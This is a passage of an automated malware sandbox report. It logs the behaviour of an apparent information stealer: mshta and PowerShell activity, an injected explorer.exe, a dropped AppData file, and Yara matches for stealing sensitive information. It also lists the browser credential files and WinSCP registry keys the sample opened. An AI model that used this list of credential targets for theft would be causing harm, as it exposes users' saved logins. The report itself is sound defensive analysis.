$psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"Jump to behavior
                Source: explorer.exe, 0000000E.00000002.2904691070.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1993693717.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989996263.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000E.00000000.1989328162.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                Source: explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989996263.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 0000000E.00000002.2895440800.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1989996263.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027E55EB cpuid 17_2_027E55EB
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfQueries volume information: C:\Users\user\AppData\Roaming\icgfugf VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfQueries volume information: C:\Users\user\AppData\Roaming\icgfugf VolumeInformation
                Source: C:\Users\user\AppData\Roaming\icgfugfQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02792112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,17_2_02792112
                Source: C:\Windows\explorer.exeCode function: 14_2_01213490 GetUserNameW,14_2_01213490
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02792198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,17_2_02792198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7944, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7728, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\data.safe.bin
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829702.cde8135c-88c3-4c34-8670-7ef017742548.new-profile.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\background-update
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834620.c7889da7-33f0-4599-8452-58d47c58437b.main.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829744.7278f154-e8f4-4235-84c5-c5c1c6af0084.main.jsonlz4
